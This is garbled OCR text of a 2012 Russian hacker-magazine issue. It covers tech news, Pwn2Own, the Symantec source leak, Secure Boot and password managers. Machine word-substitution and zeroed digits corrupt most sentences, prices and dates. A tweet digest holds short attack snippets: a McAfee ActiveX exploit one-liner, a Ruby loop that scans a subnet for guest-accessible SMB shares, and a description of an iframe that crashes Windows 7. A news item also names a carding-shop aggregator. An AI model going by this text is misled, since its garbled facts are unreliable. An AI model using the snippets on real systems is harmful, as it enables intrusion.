Мо д дерево 027 В 070 выпо л нена во соли д ном равным образом одновре­ менно вместе с во ерхтонком корпусе, а весь основы управления

помещены во эргономичную алюминиевую подставку !там же нахо д ятся порточки ввода - вывода равным образом U 0 В -концентраторl , регулируемую за высоте. Д иапазон регулирования монитора 0-й серии согласно высо т е составляет

00 см,

совершенство его

не запрещается н а клонять. П а н ел ь имеет ультравысокую наглядность

QHD 02560 х 04401, поддерживаеттехнологии Display P oгt, Dual L iпk - DVI равным образом Н DMI, а да оснащена стереодинамика ­ ми мощностью 0 Вт да интерфейсом MoЬile High Defiпition Link IM HLI д ля п одключения смартфонов равным образом планшетных П К. Устройство п относительно дд ерживает эксклюзивную технологию

0amsung

Nat uг al Соlог Е х р ег t , для на озмож н восход моя персона м которой

относитс автор аппаратная ка л ибровка цветов. 027 В 070

но <<эффект мокрой вещи >> !, некоторый не раз проявляе т ся

станет показывать сильнее миллиарда оттенков, зачем

дажеутоповых современных дисплеев. Так в качестве кого <<кристал­

гарантирует высоченный реализм равным образом закал около отображе­

лический эффект>> напрямую обусловлен матовостью па­

нии фотографий равно ви д еороликов, сделанных со через

нели, у глянцевых мониторов спирт практически отсутствует.

нумерационный фо т о- либо — либо видеокамеры. Кстати, пресс-релиз

Здесь целесообразно заметить, сколько равным образом первые образцы нате базе

обещае т, аюшки? инже н еры 0amsuпg вруч н ую будут на­

вызвали немалое рост утех, чтобы кого заранее лишь

страи во ать ц ветопере д ачу ко аждого монитора серии

0

PL5

Яр кость: 000 кд/м 0 Равномерность )мин .): 00% К возлюбленный т растность (статичес ко ая) :

0000:1 Время отклика

(GTG): 0 м с Угол обзора (гор/верт.) : 078°/1 08°

на хоть н по отношению удобство н ое к око изображение, целое соответственно пирушка а

получи окончательном этапе сборки. Кроме так г касательно , все пространство

причине : РL5 - дисплеи из матовым экраном почти что

дисплея тоже снабжена антибликовым стеклянным 011

безграмотный проявляли <<кристаллическо г по части эффекта>>.

покрытием. Да-да, со т арое доброе линза вместе с антибликом,

Р а зрешение : 0560х 0440 Глуб ан а цвета : 0,07 млн цветов

Ожидается, что-нибудь новинка поступит на продажууже на мар­

давненько да мы вместе с тобой такого никак не видели. Этот концевой особина

те текущего возраст lк сожалению, неизвестно, появится ли

надо особенно обра д что до во атыех, чьи ставни чувствитель­

симпатия и да во России!. Ориентировочная плата 027В970

ны ко таково н аза ы ваемому <<к ри ста л ли ч ескому эффекту>> !он

состави т $1199.

ЭТА МУЗЫКА БУДЕТ ВЕЧНОЙ. ПАТЕНТНЫЕ ВОЙНЫ ПРОДОЛЖАЮТСЯ

APPLEOБBИHЯETSAMSUNG ELECTRONICS В ТОМ, ЧТО ЧЕХЛЫ ДЛЯ ПЛАНШЕТАGАLАХУТАВ 00.1

И СМАРТФОНОВ (!) НАРУШАЮТ ЕЕ ПАТЕНТЫ

010

ХАКЕР

03/158/ 0012


PhoneAndroid: Почти закончил из

linux.js. Да,

сие

моя JаvаSсгiрt-реализация ядра

Linux.

[]

Почему вам возьми меня этак

Яндекс, сnециалист соответственно безопас­

Chгoot-ing на

ности веб-приложений: спе­

легко, что равно А : , Б:, В : ...

циалист объединение безопасности веб­

http://Ьit . lv/yQQq_ml:J .

Windows- где-то

но

приложений во компанию Яндекс ...

Ь.it.lvд'ol.,m_!?.<J .

Комментарий:

Да, во винде также позволяется <<чрутить>> ...

lilcBekrar: Взлом Chгome из

ASLR + О ЕР­

обходом + смачный сnлойт для того

Комментарий: Конкурс Яндекса

El

в области взлому сервисов прошел удачно;] . lil_sinnЗr:

обхода nесочницы за сов? Мы живем во разных мирах .

El

0О ко бак­ #pwn2own

А вона да РоС в целях

lilcBekrar:

Комментарий: Фронтмен компании

Vupen

Большой #fаil-приз отправляется

возму­

для

щается призовым фондом предстоящего

конкурса

PWN20WN.

McAfee SaaS 0-day IZDI-12-012]: obj.ShowRepoгt "calc.exe" .

Защитные механи1мы

становятся всегда сложнее, равным образом ради их обхода требуется пуще сил да вложений ...

McAfee

Secuгity-as-a-Service,

что устанавливает позор­

ный

ActiveX,

I:Jjt.jyд_bj..t_gf

Комментарий:

Вот да всё эксплойт- obj.ShowRepoгt

позволяющий осуществлять адрес

"calc.exe".

via rathezdi.

пания устанавливает «бэкдорь~» клиентам.

Да ... смотри этак антивирусная ком­

А вновь забавно, в чем дело? эа такую

тила во районе

lilmartincronje:

lilmeder: Написал во блог насчёт моем послед­

Водан крата да для того всех :

нем баге:

CSS

или — или JаvаSсгiрt-библиотек

подобно

jQuery.

CVE-2011-3923.

Еще

одно удаленное материализация

стих во Stгuts2: Ьlt.R:fiЬ.i.!JYLY.E.iЬ.ы.

El

0-day ZDI запла­ 1-2 ко баксов . :] Вот в такой мере ...

El

Комментарий:

HTML5 !=

Комментарий:

Исходникам безграмотный доверяй никогда, Люк! Дебаггером воспользуйся вначале равным образом убедись во потоке

Кэп ...

Сегодня у нас достаточно счета ссылок­

общеобразовательный выхлоп т витов, так сказать. Те, кто именно думает, ась? в

Java

lilmikesica:

дозволительно

Любой благонравный конструктор лени­

кадить, безграмотный оnасаясь RСЕ-багов !ну во вкусе же,

вый, тем отнюдь не менее, отнюдь не кажинный

Java- сие ж секурно], вообразите до сей времени раэ! Ведь накадить не грех всякое ...

косный конструктор хороший.

Если бы РНР был британским:

peгchance ifcondition] { // Code hеге}

otherwise { // Code hеге }.

liljcran: Написал недавний блог-пост: розыск

багов во виртуальной машине с через «Докаэателя тео­

рем» - bl.lgД.pjt . [y/~J.gZ~К.

El

Комментарий:

Не фаззингам единым ... те, кто именно инте­

ресуется методами поиска уяэвимостей,

Ручной-- iгЬ> l1 .. 054].each {lxl puts "host- 00.0 . 0 . #{х}"; 'smbclient -L 00.0.0.#{х} -Uguest -N' }.

El

Комментарий:

RuЬу-скрипт интересах скана «шар» от учет­

который гостя ...

обратите подчеркнуть что получи это.

lilstephenfewer: Открыл порцию исходников моей системы фаззинга пользу кого браузеров

Не знал об BinScope: hllQJLI:Ij_tJYLyzcQYR . Полезна

интересах

обнаружения бинарников безо

NX, SafeSEH, /dynamicbase, равно т . д.

'Fгindeг'- http:UЬit.lyLx.rUJJiW.

ХАКЕР

03/158/2012

.,,


В СЕТИ В ВИДЕ ТЕКСТОВОГО ФАЙЛА оказалисьданные насчёт шести миллионах nоль з ователей крупнейшей во КНР комnании­ разработчика сетевого ПО (CSDNI.

MEGANEWS

МИНИСТР СВЯЗИ ПОСЕТИЛ

СОБРАНИЕ ПИРАТСКОЙ ПАРТ ИИ ПАРАДОКСАЛЬНО, НО ЭТО СОБЫТИЕ ИМЕЛО МЕСТО В РОССИИ

В хо д е бесе д ы со в отношении Щ е ­

BSOD

В

WINDOWS 0

ЛЕГКИМ ДВИЖЕНИЕМ РУКИ НАЙДЕНА КРИТИЧЕСКАЯ ДЫРКА В ссСЕМЕРКЕн

голевым выясни­ л ось, ч в таком случае на це ло м по части н

п насчёт ддержи на аети д е ю о ткрыты х д анн ы х , н по отношению д ек покровитель ац ию касательно т­ к рытого госуд а рства как-т в отношении « отнюдь не в отношении цени л •>.

Кстати, официал ь ­

равным образом

нф касательно р ма ция в рассуждении н относительно плач н е вслед за для рытой ко ритиче из ко по части й у автор этих строк з вим ос т да на Wind ow s 0 х6 0 вп е рвы е появила не без; ь в Т витт е р е изв нашел тн по отношению г об ха кера

w3bd3vi l. Б а г был wi n32k.sys [ н ео д да кр а т н ы й вин в рассуждении вни для кри т ич yes ки х ошиб по отношению ко на Win XPI.

что касается бнар у ж е н во ф а йле операционной систем ы

ных коммента р ие во

ко т по отношению ры й из относительно д е р жи т вслед во ис ящ у ю в рассуждении т ядра ча не без; ть п касательно льз по части ва­

п относительно поводупри­

т е л ьско г об ан т е р ф е йс а да по части тн ос ящ уюс пишущий эти строки для нем у инфрастр у к­

сутствия главы Ми н­ комсвязи держи встреч е

ту р у. Зам е тим, чт насчёт 02 - би тн а моя персона во е р из ия ОС безграмотный изумительный не без; nриимчива

членов Пиратск касательно й

для ош ибке, на в таком случае вр е мя ко ак 0 0- б итная << Семерка » может

партиитак равным образом невыгодный по­

н е толь ко у й т да да з-з а невыгодный е на

следова л что касается .

BSOD,

так да nозволяе т ввести

на ма ш равно н у вр е д касательно н ос ный для по отношению д получай у р ов далеко не ядра. Однако самый ин т е р сделал ны й нюан вместе с з а ко лючается на др у гом: пр об тотип стих , демонс т риру ющ е го , в духе ваша сестра з ы ва т ь этот не без; потому что й, ранее у тек в С е ть . О ко а з а лос ь , ч в таком случае сие пр ос т ой НТМ L- скрипт. Е г по части з а­ п уск на б ра узе р е

Sa fari б ы из тр насчёт пр иведет для ошиб ке со тра н и­

ц ы бери н е спр е д е л е н сверху м у ча из т ко е nамяти, да устройство n об кажет

•с равным образом н ий э стриппер от м е рти ». Этотскриn т представля е тсоб по части й все г по части чуть т е г

iframe не без; чр ез выч ай н по части б что до льшим атриб у фолиант

высо т ы. Уя зви м ос т да т по части чн насчёт п об дв е р но бери 04-битная издание

для

а для само с лица разумеется , во России П ира т екая ассоциация даж е неграмотный зарегистрирована [нет,

Windows 0, в рассуждении дн ако,

ребята пытались , а ни ложки безграмотный вам ш ло) . Тем никак не м е нее, парок т ия постоянно

ском п р по отношению ме аттракцион относительно на ин ы да др у г ие вместе с равно вместе с темы. Патчана нынешний

nроводитсобрания,одноизкоторыхсостоялосьв не без; ерединея н варвара

момен т н е су щ е ств у.е. т .

что ото м е ч аю т э для не без; перты , м насчёт г у т бытийствовать

на книж н ом магазине << Ц иолко на скиЙ>>, к~то ры й наход ится во зда н ии П олитехниче ­ ского музея . Д ля всех пришедших бери совмест н ый выручка П иратской n артии, Ф возлюбленный д а развития электронной демократии равным образом рабочей группы << ИГ опротестование н ых действий>> стало полной неожиданностью приваливание во магазине Игоря Щ еголе во а , ми н равно ­

стра своя рука равным образом массовых коммуникаций РФ. П редсе д атель партии П а во ел Р ассуд по отношению в nишет на своем ЖЖ : << М инистр есть вид. в духе будт что касается зашел во во ы хо дн ой купит ь п ару ко ниг равно ни аза неграмотный знал относительно н амечен н в отношении м собрании. П рисутст на ую суп е н а во стре ч е п ро г раммеры не без; р азу нак ан ул ись нате Щ е г олим на а. Ещ е быl Н е каж д ый д е н ь есть т ь возможность заявить на се ась? думаешь на рыло министру связи. Ау n р что до гр ам ми­

стов было почто ему сказать.

:1 Н насчёт министрдержался молодцом, говорил ск л а дн о,

впрочем малограмотный сказал ни плошки конкретного. Сразу видимое дело - немаленький опы т работ ы в аппарате >> . Щеголев ответил получай шпалеры вопросов, из-за д анных учас т никами собра ­ ния. В частности, рассказа л , что-то после го д -по л ископаемый на Р оссии може т б ыть вв е д е н а

порядок электронного голосова н ия, да и то общество, по части ми н равным образом ю минис т ра, пока безграмотный испытывает nотребнос т да во такого типа системе. П одробности во ЖЖ П авла

Рассудова:

webpo lit.livejournal.com/72397.htm l.

NGIИX сс ВИНЧЕСТЕРНЫЙ» ГИГАНТ

NGINX ВЫШЕЛ НА ВТОРОЕ

ТН Е Pl RATE ВАУ &ОЛЬ-

-компания

МЕСТО по части числу обслужи-

ШЕ НЕ &УДЕТ ХРАНИТЬ

TORRENTFREAKCOO&ЩАЕТ, чт относительно Cr ysis 0 стала

приобрелаподразделение

ваемых активных сайтов,

ТОRRЕNТ-ФАЙЛЫ равно nолно-

из амо й скач равным образом ваемойчерез

nомощью тогда а обвинил

комnании

обогнав

стью п е р е й -де т для magnet-

BitТo r rent игрой для того РС

ссы л ки. Теn ерь magnet-U RL

во 00 01 г оду. С л едо м равным образом дутСаll of Du ty: Modern Warfa r e 0 и Battlefield 0.

Google на nоддержке nиратства . В Google сnоко й а доставать

Seagate-

Samsung в области ошибаться

изводству жестких дисков.

Суммасделкисоставила

$1,375 млрд.

012

Microsoft 015. По данным комnании NetCraft, на первом месте nока Apache (57,93 %).

предлаг аю т из автор этих строк дл ваш покорный слуга загруз ки по умолчани ю .

МЕДИАМАГНАТРУПЕРТ

МЕРДОК завел Twitter равно от его

звалиобвинение чушью .

ХАКЕР

03 /158/ 0012


GOOGLE НА ТРИ ГОДА ПРОДЛИЛАСОГЛАШЕНИЕ С MOZILLA об исnольз овании своего nоисковика во качестве основногодля Fiгefox .

БОЛЬШЕ КОЛОНОК, ХОРОШИХ

MICROSOFT, КОНКУРЕНТЫ

И РАЗНЫХ

ИАRМ-СИСТЕМЫ

СРЕДНИЙ ЦЕНОВОЙ СЕГМЕНТ И НЕИЗМЕННО ВЫСОКОЕ КАЧЕСТВО.

О НЕ ВСЕГДА ЧЕСТНОЙ БОРЬБЕ ЗА МЕСТО ПОД

КОНЕЧНО, ЭТО

СОЛНЦЕМ

EDIFIER

Е

ще во конце прошлого возраст шатия-братия

Microsoft

сделала заявление, которое породило у многих

нехорошие подозрения . Напомним, касательно нежели так тому и быть выступление .

В конце 0011-го шарашка

Microsoft впервой озвучила , что Windows8 будеттребовать Secuгe Ьооtдля загрузки [то есть обязательной активации режима безопасной загрузки

UEFII. Эта выражение вещь е ттак : UEFI сохраняет«секретные ключи >> во ОС. Все, сколько хочетзагрузиться бери компьютер, ко при­ меру операционная система, равным образом вместе с польз американский рубль тэти ключи в целях до­

вместе с туп а для

UEFI. Е сли во ОС безвыгодный прописан соответственный источник ,

возлюбленная далеко не получит доверенность нате загрузку. Liпu х-сооб ще не без; тво уже если на то пошло попыталосьдонести накануне пр оиз водителей , что-то

осуществить передач у ключей в из-за что назначить

Linu x хорош куда сложно, Linu x для заточенные лещадь Windows8

устройствастанетпрактически невозможно.

Однако

Microsoft корректно пояснила , ась? отнюдь не имеет Linu x равно дру ги х в рассуждении ткрыты х ОС , да сражается

ни плошки сравнительно от чем

ни капельки безграмотный не без; ко нк у р е нтами , а со вредоносными кодами. Мол , безопасная нагрузка тем равно х ороша на работы

для

итайская шарага Edi fieг представила во э том месяце вмиг двум новых модели. Об е новинки по­

полнили топовую линей ку систем

0.0. П ервое ауд ио-ре ш е ние- колонки R1500TM

от пр о­

фессиональным микрофонным входом, кой имеет независимый датчик громкости . Новинка может похва­

случаться тради ц ионным пользу кого

Edifier деревянным

кор пусом

[что гарантирует относительно т сутствие резонансов!, НЧ-дина миками

napa

интересных

фактов : возьми заводах

компании Edifier производится более 12 млн комплектов мультимедийных к что до лонок во година . За­ воды расположены на трех континен­

тах. Научно­ исследовательским

из магнитным экра н иро во а нием да 08-мм шел ковыми ку­

центром компании

полообразными твитерами . Стереосигнал, подаваемый

руководит глобально

возьми входные разъемы

RCA,

обраба тывает ся схемой дина­

мическо г что касается повышения высоких частот, которая спе циаль­

славный конструктор

вредоно сных программ. Надо признать, выглядит целое это действительно логично. Но сейчас

Microsoft подготовила судоремонтный завод уме нте требова­

ниями, которые ничего не поделаешь выполнитьдля сертификации компьютеров получи и распишись со вместимо ст ь вместе с Windows 0. Бумага , увы,

подтвержд ает худшие опасения. Здесьлучше просто-напросто про­ цитировать.

Официальн ое руко водстводляпроизводителей,желаю­ щи х паркет внушать сер тификацию Windows 0для своих усишко тро йств,

да художник Фил

не без; траница

Джонс .

мо исполнить мочь отключения

же разработана чтобы мультиме диа.

Windows, что-то

такойпроцессперекрываетещеодинканалпроникновения

016: « В системах, отнюдь не относящихся кАRМ, необходи­ Secure Boot при помощи

интерфейсустановки прошивки . Физически присутствую­

Вторая новика-двухполосные колонки R900Т. Эта акустическая 0 . 0-система, оснащенная 0-дюймовыми НЧ-динамиками равно 03-мм шелковыми куполообразными

щий пользовательд что касается лж е н кто наделен случай отключить

Secure Boot вследствие интерфейс установки, безвыгодный владея Pkpri v. Программное вырубание Secure Boot средствами UEFI

т ви терами, важно воспроизводитгл убок ий, шикарный

безграмотный необходимо бытийствовать вроде ни закачаешься срок вслед за грузки , ни по части ее

тромбон равно зво нки е высокие частоты. Габариты

об кончании>>.

скромны:

040 х 026 х 097 мм.

R900T смертельно

Колонки несомненно подсоединить

П олучается, декларирование

Microsoft от м, зачем возлюбленная небу­

ко выбранн ым источникам сигнала путем 0,5-мм от тер еовхо д

деттребоватьотnроизводителей «ж елеза•запретить

RCA иначе RCA получи и распишись RCA,

отъединение

ко торые со п особ ны провести да уси струить

Secure Boot, в деле распространялось лишь

сигнал, обращающийся вместе с любого источника звука, да обес пе­

сверху традиционные ПК , н по отношению безвыгодный получай АRМ-устройства. Пр оизво­

читьвысокоекачество звучания.

дит е ли систем, базирующихся возьми ар х итектуре ARM , теперь не вплоть до лжны выделять никаких способов отключения безопасной загрузки. Именно таковой время - обязательная

ПОВСЕМЕСТНАЯАВТОМАТИЗАЦИЯ

безопасная заваливание -ставит Linu x [и безвыгодный только! на затруд­ нительное положение. Фактически сие озна чает, чтотеперь для «за гружаемости >> возьми одной с таких машин , сертифици­ рованных держи совместность вместе с Windows

ПО АДРЕСУ MEGASEARCH.CC ЗАРАБОТАЛ АГРЕ ГАТОР КАРДЕРСКИХ МАГАЗИНОВ, ТО ЕСТЬ РЕСУРС ДЛЯ ПОИСКА ВОРОВАННЬIХ БАНКОВСКИХ КАРТ ХАКЕР

03/158/ 00 02

0, годный

ди из трибутив Linuхдолжен заключать се ртифицированные крип­ таключи с конкретного равно з г отови т ел моя особа компьютера. Вста е т ре з онный вопрос: идеже их взять? Е сли выдачей ключей будут за ниматься производители , ведь разработчикам ди стрибу ­ тивов придется поверстно контактировать из каждым изо ни х.

Иеслиогромная ко рпорацияможет се бетакоепозволит~ толин укс оидам сие врядли окажется по-под силу. Централи­ зова нного по части ргана сер тификации , каковой бы формировал к лючи с целью режима безопасной загрузки

UEFI, невыгодный существует. Microsoft пытается драться далеко н е всего только от малварью, а равным образом вместе с устано во для ой Linu x, Android равно др у­ Словом, объединение хоже,

ги х открытых ОС возьми АRМ-системы.

013


MEGANEWS

КАРСТЕН НОЛ ИЭSECURIТY RESEARCH LАВS эврика очереднуюуязвимость во GSM . Подробности возлюбленный в эту пору никак не разглашает. ·

СКАЧАЙ И РАСПЕЧАТАЙ!

PWN20WN

ПИРАТИТЬ ЧЕРЕЗ СЕТЬ МОЖНО НЕ ТОЛЬКО ИНФОРМАЦИЮ,

ПРАВИЛА

МЕНЯЕТ

НО И ВПОЛНЕ РЕАЛЬНЫЕ ОБЪЕКТЫ

ПОПУЛЯРНЫЙ КОНКУРС В ЭТОМ ГОДУПРОЙДЕТ В НОВОМ ФОРМАТЕ

м

ы сейчас отнюдь не ра з рас­

сказывали тебе о замечательномха­

кереком конкурсе

Pwn20wn,

учас тни кико т ороголомают

самый другой софт равным образом желе­ зо, а nотом уносят от внешне

хакнутыетрофеи [железные, конечно же) во качестве рядом ­ зов. Сообщаем, аюшки? на этом году инструкция соревнования

изменились. Теперь во конкур­ се участвуюттолько

з

Microsoft Apple Safaгi, Google Chrome равным образом Mozilla lnteгnet Exploгer,

0-принтеры шаг за шаг , хотя не исключено про­ бираются в иждивенческий барахолка .

Уже безотлагательно подобный девайс [к примеру,

японскую

Firef oxдля операционных си­

iModela) мож да подле приобрести вслед за пару

стем

вариант, а отнюдь не перематросить да забросить производственный мольберт не­

вообразимых размеров. С каждым среди бела дня об этих трехмерных чудесах прогресса появляется всегда

лишше статей, постов, дискуссий. А разок интерес и требования растут, появляется равным образом ультиматум .

Ещ е пр в отношении шлой по осени получи и распишись т орре нт-тр екере

The Pirate Ва уоткр ыл ся

раздел от пр ограммами

чтобы 00-принтеров, а какая-то активность наметиласьтамтолькосейчас.Д об рыелюди

Windows 0 да

Мае

05 Lion

[последние версии со все-

тысяч долларов, равно э т касательно короче вот поэтому и есть «домашний»

ми патчами). Мобильные

Одним изо больше всего

девайсына конкурсе значительнее

известны х про·

открывать невыгодный будут.

ектов до ЗD·печати является

RepRap

Главным сnонсором объявле-

-открытый прое ко т

получи и распишись общество

до созданию принте­

Hewlett- Packard. 30

р об во , способных

Три сообразно бедителя получат денежныепризыв размере 00тысяч,

восстанавливать

тысяч да 05тысяч долларов плюстрофеи во виде н аутбуков не без; праздник самой

себя. Новейшая

системой , которую им удастся взломать.

образец называется

Mendel, равным образом скопить

Компания

Google в свой черед учреди ла дополнительные призы 20 тысяч долла­

наконец-то начали делить что проект ми,

ее ловок любой желающий (это

приближенно равным образом реальными объектами. Уже не откладывая на этом

впрямь не·

канал следовать исnолнение sandbox-кoдa вместе с исnользованием одной лишь

разделе дозволяется из кача ть пластма ссово го робота

сложно!. Стоимость

уязвимости во

после взламывание браузера Chгome. Она обе щает оплатить

всех компонентов

Chrome.

В

0О тысяч долларов оценивается

ис п олне н ие

с вселенной Warhammeг 00К иначе хот-род­

составляет просто-напросто

sandbox-кoдa не без; исnользованием уязвимастей равно как во Chгome, приблизительно да на

мо д е ль ш евроле

$520.

операционной системе.

0970 лета .

Н относительно сие безобидные

игру ш ки, а во всяком случае во Сети поуже некоторое эпоха цир­

Но самое главное, почто во этом году изменятся самочки распорядок

кулируютслухи от м, в чем дело? получи черном рынкетор­

Pwn20wn . Взломанная строй теnерь далеко не куда там

гуюти30-моделямискиммеровдлябанкоматов.

зания, во вкусе вперед . Все прочие участники имеют допустимость

изо состя­

Есть даж е n одтверж д е ния тому, что-то моше нни ки

во поток трех конкурсных дней кракать ее своими методами.

действительнопольэуютсятакимимоделями!

Соответственно, окончание соревнования сегодня подсчитывается

Н е т, во « Б ухте» они нонче малограмотный на сплывали, а сие

no очкам.

приметно воnрос времени . По хоже, у правоохрани­

В этом году

тельных органов объединение всему миру спешно появится

курсе не запрещается быть в доле равным образом во удаленном режиме!

Pwn20wn

nройдете

0 в соответствии с 0 марта.

Не забывай, сколько во кон ­

снова в отношении дна головная прозопальгия .

КОМПАНИЯSОNУПРЕД­

СТАВИЛА КАРТЬI ПАМЯТИ

SONY

собственного формата

XQD.

Ориентированы они как на профессиональных фото­ графов, приблизительно равно получай энтузиастов.

В режимах чтения\эаписи

H

Seri senees

02 GB

пропускная талант

достигает

0 Гбит/с (125

XQD

Мб/с) .

ДВАДЦАТЬВОСЬМОГО

КОМПАНИЯ TIOBE SOFTWARE

Продажи сделано начались. Карта

ЯНВАРЯ СТАРТОВАЛ ВТОРОЙ

УДОСТОИЛАОВJЕСТIVЕ-С

QD-H16 объемом 06 Г б стоит $130, QD-H32 бери 02 Г б- $230,

FACEBOOK HACKERCUP,

ЗВАНИЯ «ЯЭЬIК ГОДА».

какой-никакой проводится еже­

Однако возьми первом месте

Также представлены да устрой­

годно . Лучших ждет вояж

по мнению популярнотипо-прежнему

ства про работы вместе с новым

во штаб-квартиру Facebook,

есть смысл Java, а следовать ней идут С,

а победительполучитпять

С# равно С++.

форматом.

тысяч долларов.

ХАКЕР

03/158/2012


• •

~ WI!XLI!Г.

www.wexler.ru

Электронная диссертация вместе с доступом на Интернет

У SYMANTEC УКРАЛ И ИСХОДНЫЕ КОДЫ АНТИВИРУСА

Читай. Смотри. Слушай.

ХАКЕРЫДИСКРЕДИТИРОВАЛИПОПУЛЯРНОГО ВЕНДОРА

оддавлением хакеров шарашка Symaпtec, являющаяся одним изо самых известных на мире поставщиков решений

на сфере информационной безопасности, была вынуждена признать, сколько хаке рам посчастливилось получитьдоступ для исходному коду це ­

лого ряда ее прод уктов. По словам представителей Symaпtec, во ходе расследования было установлено, аюшки? угон исходного стих анти­

вирусов произошла снова на

0006 году.

После сего пароходство ввела строй

мер с целью усиления безопасности, чтоб малограмотный попустить повторения по­ добных инцидентов во будущем. Хакерам посчастливилось нахапать исходные коды таких продуктов, на правах Nогtоп Aпtiviгus Согрогаtе Editi oп, Nогtоп l nteгпet Secuгity, Nогtоп SystemWoгks равным образом pcAnywheгe версий

02.0, 12.5. Об утечке из чего можно заключить кого хошь спроси во середине прошлого месяца, когда невесть какой пират Yama Tough, причисляющий себя равным образом ко «Ано нимам», и ко хакерекой группировке Lo гd of Dhaгmaгaja, написал во Твиттере, что располагает исходниками Noгton Utilities. В улика он 12.1

да

выложил ссылки получай незначительный подлинник от описанием программно­ го интерфейса сервиса пользу кого создания в отношении писаний образцов вирусов,

а в рассуждении сего равно со писок файлов, содержащихся во архиве со исходным кодом Nогtоп Antiviгus. Опубликованный судоремонтный завод у мент, кстати, датируется апрелем

0999 года.

Конечно же,

Symantec одновременно сообщила,

что такое?

новость изо сего документа отнюдь не может сделать гадость нынешним продуктам компании. Зато картотека со исток ным кодом пароходство отнюдь не про­ комментировала.

П в рассуждении заявлениям самих хакеров, информа цию им посчастливилось выудить

не без; серверов ведомства военной разведки Индии. Иными словами,

у оргазм произошла никак не изо сетей самой Symaпtec [хоть сие радует). По некоторым данным, хактивисты опубликовали имеющуюся у них информацию, с целью помочь судебному разбирательству, которое

только что началось во США. Д есятого января в сравнении со чем Symaпtec было выдвинуто нарекание во том, в чем дело? симпатия продвигаетсвою продукцию с через этак называемых sсагеwаге-программ, которые запугива­

корма пользователей, извещая их относительно возможных проблемах со безопасно­ ст ью во особенно назойливой форме. Несмотря получи целое заявления Symaпtec, что такое? у хакеров оказались старые данные, которые безвыгодный могут принести никакого вреда, раз­

работчики ранее начали стравливать патчи. Компания предп очитает перестраховаться , помимо зависимости оттого, каким ветром занесло не который иное «утекла»

катамнез да в какой степени симпатия актуальна нате сей момент.

WEXLER.BOOK

МЫ ЛЕГИОН: ИСТОРИЯХАКТИВИСТОВ

ПРОФЕССИОНАЛЬНЫЕ ДОКУМЕНТАЛИСТЫ ИЗ КИНОКОМПАНИИ LUMINANT MEDIA СНЯЛИ

03-МИНУТНЫЙ ФИЛЬМ

О ВЕЛИКИХ И УЖАСНЫХ

ANONYMOUS ХАКЕР

Т7006

WI!XLI!Г. STORE

Удобный достуn для бесnлатным книгам и nоnулярные новинки.

Скачивайте равным образом читайте в

www.wexler.ru!

:х:

насчёт

«МЕТРО 0033» ДМИТРИЯ ГЛУХОВСКОГО И ЕЩ~

<t

ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО

Cl.. с:[

по части

В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ WEXLER

r::

03/158/2012 ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ : 0 (800) 000 06 00


IEADER

КОЛОНКАСТЁПЫИЛЬИНА

ОХРАНЕНИИ ПАРОЛЕЙ ВЫБОР РЕШЕНИЯ

тож извращаться от его синхронизацией вследствие

активировать во аккаунте

Использовать единодержавно да оный а жете место чтобы всех

оный а самый Dг орЬох . Дост уп для хранилищу

вые жете роли, так поместиться лишенный чего такого токе нате хорошенького понемножку

сервисов сразу- одна изо самых серьезных

защищен мастер-ключом [сложным паролем),

поуже невозможно. Каждый однова склифосовский необхо­

ошибок пользователей. Но равным образом побеждать во голове

некоторый на целях безопасности неисполнимо

партия в рассуждении всунуть флешку, швырнуть

огромное наличность уникальных пассов­

восстановить. Будь осторожен!:)

проэксплуатировать сгенерированный программой

НЕКОТОРЫЕ ФИШКИ LASTPASS Я невыгодный буду бубенить что касается том, в качестве кого использо­

Только во этом случае дозволительно хорэ домчаться до самого

дилемма откровенно непосильная. Я долготно пытался

одноразо­

Sesame

да

параль совокупно со своим мастер-ключом.

приучить себя для использованию менеджеров

батман ролей чаятельно

LastPass

KeyPass [keepass.info), же

с сего этак околесица равным образом далеко не вышло. Открывать

вать

программу, чтоб выслеживать затем ни туды и ни сюды параль

могу далеко не разделиться от тобой несколькими по­

-явно никак не самое удобное, что-нибудь дозволительно приду­

лезными фишками, которые меня порадовали .

LastPass,- тама

целое элементарно. Но никак не

мать. Да равно локальное хранилище, во котором

хранилища. По отдельности ась? мастер-ключ, что флешка вместе с

Sesame

сокровище для того злоумыш­

ленника ранее безграмотный представляют.

Двухфакторнан согласие путем

Google

находятся зашифрованные батман роли, попахивает

Проверка надежности батман ролей

Для авторизации твоя милость и можешь дать взятку

архаизмом- безграмотный трепать но его держи флешке?

Водан лишь только эпизод того , который танцевальный шаг роли хранятся

непритворный токен-например YuЬikey следовать

Короче говоря, автор этих строк решил опробовать решения,

на надежном хранилище, неграмотный делает их по­

[ stoгe.yuЬico.com ),- а можешь воспользовать­

которые беспричинно же, равно как равным образом

настоящему безопасными.

ся еще готовым решением с

KeyPass,

:)

помогали бы

LastPass

от твоего

Google.

$25

Напомню ,

поднимать уникальные жете роли да экономить

разрешения может предпринять прыткий оценка

что-то строй через поискового гиганта предлагает

их, только мало того автопилотом использо-

пассов, несложно отыскав середи них простые равным образом от­

установку насмартфон специального прило­

вались бы их во браузере! Вариантов после этого безграмотный этак

кровенно слабые [вроде

жения

много. Среди специализированных решений

му встроен бенчмарк, каковой высчитывает

«123456») . В програм­

[Google Authenticatoг), которая во кажинный

час времени генерирует исключительный одно­

как никогда раскрученной оказалась утилита

бонитет надежности всех паролей,- ре­

одноразовый ключ. Так вроде мы непрерывно пользуюсь

0Passwoгd [ agileЬits.com/onepasswoгd ), кото­

зультат не запрещается уравнить не без; показателями других

этой системой на входа на

раиса изначально появилась пользу кого Мае, так позднее

пользователей во специальном рейтинге.

настроил ее равным образом к защиты

Одноразовые парали

са йте 0helpdesk.lastpass . com/secuгity-options/

goog 0е -а ut hе nti саtог).

была портирована да для того

Windows.

Продукт

адски качественный, так возвращать $69.99 вслед за

Gmail, ведь ваш покорнейший слуга шелковица же LastPass . Подроб­

ную инструкцию позволено отрыть получай официальном

кроссплатформенную версию ми показалось

Многих, надо полагать , смутит выполнимость до­

слишком. Тем побольше сегодня, рано или поздно практиче­

холм для движение ролям вместе с через одного всего только

ски к лишь не возбраняется раскопать бесплатную альтер­

мастер-ключа . Нет проблем! На флешку допускается

одноразовые парали равным образом двухфакторная автори­

нативу. Та ко вая, на общем-то, фактически

внести специальную утилиту LastPass Sesame [есть версии по-под любые ОС), которая,

зация доступны токмо платным подписчикам .

бегло нашлась-ейстал любопытный

стервис

сообразно сути, превращает накоплятель во токе н. Если

надежное сохранение батман ролей.

LastPass [lastpass.com), получи котором автор этих строк да

